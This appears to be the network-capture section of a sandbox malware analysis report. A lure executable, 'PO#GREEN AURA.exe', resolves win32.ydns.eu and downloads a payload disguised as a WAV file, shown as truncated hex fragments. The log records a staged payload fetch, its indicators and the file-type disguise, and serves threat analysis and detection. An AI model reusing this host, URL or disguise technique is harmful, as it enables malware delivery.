Mar 6, 2025 07:06:15.164833069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164866924 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164880037 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164901018 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164930105 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164942026 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.164963007 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.164997101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.165007114 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.165030956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.165062904 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.165072918 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.165096998 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.165131092 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.165142059 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.171974897 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172070980 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172085047 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.172106028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172138929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172152996 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.172173977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172207117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172219992 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.172243118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172271967 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.172285080 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.225785017 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.266645908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266736984 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266772985 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266793013 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.266810894 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266844988 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266859055 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.266879082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266912937 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.266917944 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267425060 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267457962 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267498016 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267513037 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267545938 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267559052 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267581940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267630100 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267632008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267683983 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267716885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267726898 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267751932 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267816067 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267818928 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267867088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267901897 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267911911 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267937899 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.267986059 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.267988920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268039942 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268075943 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268084049 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268111944 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268145084 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268176079 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268187046 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268220901 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268239021 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268254995 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268305063 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268325090 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268377066 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268426895 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268428087 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268462896 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268512011 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268512011 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268547058 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268596888 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268596888 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268632889 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268686056 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268691063 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268743038 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268775940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268795013 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268826962 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268879890 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.268914938 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268965960 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.268999100 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269017935 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269056082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269089937 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269119978 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269123077 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269172907 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269175053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269207954 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269241095 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269274950 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269292116 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269326925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269340992 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269361019 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269395113 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269407034 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269429922 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269463062 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269473076 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269496918 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269579887 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269592047 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269613981 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269650936 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269659996 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269686937 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269721031 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269731045 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269756079 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269789934 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269802094 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269824028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269856930 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269866943 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269891024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269934893 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.269963026 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.269998074 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270030975 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270046949 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270065069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270098925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270107985 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270133018 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270169020 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270176888 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270210028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270243883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270256042 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270277977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270312071 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270319939 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270348072 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270380020 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270390034 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270415068 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270447969 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270462036 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270482063 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270514965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270524979 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270550013 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270582914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270591974 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270617962 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270653009 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270665884 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270685911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270720005 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270730019 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270755053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270787954 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270797968 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270823002 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270855904 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270865917 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270893097 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270941973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.270950079 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.270977020 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271018028 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.271048069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271083117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271117926 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271127939 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.271152973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271188974 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.271197081 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.271897078 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.272717953 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272773027 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272797108 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.272828102 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272862911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272876024 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.272897005 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272931099 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.272942066 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.272965908 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.273011923 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.361785889 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.361902952 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.361975908 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362004995 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362056017 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362090111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362122059 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362123966 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362176895 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362195015 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362211943 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362257957 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362263918 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362298012 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362330914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362358093 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362380981 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362416029 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362426043 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362452030 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362485886 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362494946 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362520933 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362554073 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362570047 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362588882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362622976 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362642050 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362658024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362692118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362725973 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362745047 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362759113 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362777948 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362797976 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362832069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362849951 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362865925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362899065 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.362915039 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.362977028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.363012075 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.363028049 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.363045931 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.363078117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.363094091 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:15.363114119 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:15.363162041 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:20.851706982 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:20.851787090 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:28.345211029 CET	49733	80	192.168.2.4	45.144.214.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 6, 2025 07:06:13.340841055 CET	57214	53	192.168.2.4	1.1.1.1
Mar 6, 2025 07:06:13.355356932 CET	53	57214	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 6, 2025 07:06:13.340841055 CET	192.168.2.4	1.1.1.1	0xe5e7	Standard query (0)	win32.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 6, 2025 07:06:13.355356932 CET	1.1.1.1	192.168.2.4	0xe5e7	No error (0)	win32.ydns.eu		45.144.214.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

win32.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	45.144.214.104	80	2136	C:\Users\user\Desktop\PO#GREEN AURA.exe

Timestamp	Bytes transferred	Direction	Data
Mar 6, 2025 07:06:13.369082928 CET	93	OUT	GET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1 Host: win32.ydns.eu Connection: Keep-Alive
Mar 6, 2025 07:06:14.195303917 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 06:06:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 06 Mar 2025 05:27:56 GMT ETag: "fa008-62fa5c4b0fd37" Accept-Ranges: bytes Content-Length: 1024008 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: audio/x-wav Data Raw: 19 02 bf 4e 6d e7 2a 70 36 9a d1 67 58 8b da f0 54 d8 33 5d da 8e e9 ca 43 e0 63 a0 5b 22 f8 ba 0c e1 b5 48 60 f1 b3 ba 9f 3d 95 e0 7b 05 f8 45 6d 49 79 a1 c0 17 dd 92 8e ad 3c 79 9e 5c 8d 37 39 a6 9a ac 36 dc d9 e1 0b bf 13 3e 14 e1 31 17 fb 75 8f a5 32 7f 9d 52 3a 29 78 25 f2 c5 49 d3 2e 55 79 6e 70 0e 73 00 1b 00 0f f8 69 81 6f 82 f0 3d 02 d3 29 49 1b 93 7c ab 89 f1 03 30 72 a8 cd 1f 3b d3 55 09 99 51 c6 e5 c2 c4 2b 13 bb 86 ad b5 ed 20 37 3d db 0a 1e a4 6c 92 e4 e0 f8 fd 1c ce 70 a3 62 f6 f8 86 0d 38 82 84 49 5c fb 6c 84 78 b6 18 5b 90 be 14 4a 39 59 99 d8 d9 65 9b de bf 34 27 f4 1e 06 eb d7 f8 c8 a5 8e 3c 94 99 f3 f8 21 0b 83 f0 dd 51 a0 45 41 83 78 37 fb 4e 67 fc 7e 42 73 7d c7 d5 48 98 bd cb 34 a0 8d 8b 2b 89 6b 1f 74 63 59 9e 52 11 f3 a8 33 3e d4 9b ef 94 65 1f 6e 8f ae c2 11 e9 19 45 be 88 54 12 ba b3 c2 a1 37 52 bd c2 17 ee 2e ba 80 55 1b a7 83 2a 74 0c d1 0b 80 e7 15 71 38 84 87 ab 39 a8 f4 a7 af 95 8d 7e f9 92 89 b1 f0 0f f5 47 98 2f 6d e9 3f a7 5a 37 41 07 d6 87 6e b2 70 3d ce 8d fa be [TRUNCATED] Data Ascii: Nmp6gXT3]Cc["H`={EmIy<y\796>1u2R:)x%I.Uynpsio=)I\|0r;UQ+ 7=lpb8I\lx[J9Ye4'<!QEAx7Ng~Bs}H4+ktcYR3>enET7R.Utq89~G/m?Z7Anp=@p7v#dn=2hl&C>9-eSr\|&x!Y^52PR[ZNRPZmMYWfr(M59$nsQEbI4N?h^X~i3Ulx',O kVTwqE-euk}<}z7)FOp<~J"ekk6;,9cWC8?7#@,&!#j~M(]nrBoPYv#?IIgE2M$s\|BM>:WY8MLO2XZ0XV>."ZZ/c"O)zpdHWo,{K3X-=Elv]1WG-X*&(2$[GvQUs'D-"6)VXZb;k
Mar 6, 2025 07:06:14.195379019 CET	1236	IN	Data Raw: cd 54 c4 42 2e 84 13 8b 19 89 e3 61 25 a9 ff fe 1d ee ea 78 62 6d 92 c2 07 d9 04 d7 fd e3 86 ae ed 8e 31 46 e3 79 1a 37 e1 7f 95 97 e2 f3 29 19 29 57 a0 e2 9f 5d 17 5a ff f1 6d 87 d8 ed a7 25 0d 6f e9 e6 b2 8f f6 e7 8b c9 c1 6b 33 ea 5d 7a 85 ab Data Ascii: TB.a%xbm1Fy7))W]Zm%ok3]zS[6j,122KTgC[:.}%;X$9GN\t$=}Q3Z3"%@1amE3Y~+Vx@aC\nH#rFUaJSO\|$-h\|;ri
Mar 6, 2025 07:06:14.195400000 CET	448	IN	Data Raw: 2d 2f 3e fe 62 84 6b a7 b2 d5 e3 c4 82 12 09 ec 2d 61 87 42 75 9d 1a 27 8d b6 b0 57 d3 11 d2 75 f0 d4 1f e2 f2 32 24 0d 42 25 ff c8 a2 95 47 5d 1c 96 f9 5a 95 1a 73 72 c6 b8 c1 d7 80 f6 cd d0 f3 ee bd 05 90 5c c6 7e a8 5f 34 db c5 1b 5a c8 fd 2a Data Ascii: -/>bk-aBu'Wu2$B%G]Zsr\~_4Z>n\}eKkmAAt?\QVx~XV9HA[6T/PjOF;}mPVxnX[$t})lW"> Q9E(&k4M"
Mar 6, 2025 07:06:14.195417881 CET	1236	IN	Data Raw: 67 60 0e ab e0 2b e3 63 c2 03 c6 b5 dc 82 72 b0 68 23 f8 2a 98 2c b7 9b 42 46 3d e7 54 2b 0b a2 a9 90 83 64 0a 6f b1 1b 46 4c 49 8e 88 85 06 e9 4a ad ab 12 09 d6 f4 1b 7f eb 63 7d 71 de 22 50 35 49 98 da d3 ca a7 7d fb f1 1b e3 50 42 a6 70 9e 1b Data Ascii: g`+crh#,BF=T+doFLIJc}q"P5I}PBpY#U'hJvoi{Z'OdO4);jowG;./f'HpTRqYUnwln3eZAP3`s!.hCKW^K8^m>
Mar 6, 2025 07:06:14.195456982 CET	1236	IN	Data Raw: 16 79 21 5f c1 32 57 26 76 67 c0 a4 76 4f c8 79 da 32 25 8e da 37 29 54 f2 6c 23 89 28 18 5a 2a 9f 90 45 bf 64 d4 d7 86 2d a2 15 e1 f6 e5 68 90 64 8d 3a 7f 5c 87 30 6c 2f 7c af 55 36 c4 29 3f fd 94 8a 49 f5 24 6d cc 00 ad f9 e0 fb 11 a6 97 5f c7 Data Ascii: y!_2W&vgvOy2%7)Tl#(Z*Ed-hd:\0l/\|U6)?I$m_XsfD/Z=Ihl6Z%tFVa+FYdu3D)=4p(t7U7;mI8\s3ni{4S,]b=3
Mar 6, 2025 07:06:14.195492983 CET	1236	IN	Data Raw: 1e e8 46 ef d8 04 9f dd 04 32 8e 57 0b 47 63 15 75 1f 88 fd 38 3f 00 26 21 91 bc ba 93 ad 97 83 c6 1a 33 74 07 4e d5 53 00 a5 e3 93 ce 8d 8d 7f 6d 99 64 8c cc 46 38 09 83 39 1f e4 cb 12 6d ac 31 82 9e 3f 45 4f 0f 08 b7 6e f7 12 cb ad fb bb aa bc Data Ascii: F2WGcu8?&!3tNSmdF89m1?EOnQ8tjV(ai-!t>%`1#NkZ^RhV\YLcm!c*t\|VJU}~2lCD#p?@R#_5-.x9<,'gk
Mar 6, 2025 07:06:14.195529938 CET	1236	IN	Data Raw: 20 f2 13 1f 5e c0 de f9 f5 ca c6 2f 88 be e1 74 dd cc b9 1d ca 8a 5d fe fa 2a 66 59 3e 43 91 f6 00 c0 19 35 aa 6b 9a 73 8e 5e 10 2b 10 7d 33 d4 84 e6 24 9a 20 5b ab 57 e8 8d 78 10 47 ea 06 eb 10 f8 16 41 57 fa af a2 41 86 9e 62 9f 40 14 78 df 45 Data Ascii: ^/t]fY>C5ks^+}3$ [WxGAWAb@xEkA;7}\6b]6nQ?{zKv 7/AzojM3'e(`[-usl5PX+a7(mFyp^$9TAr(D!xi7C
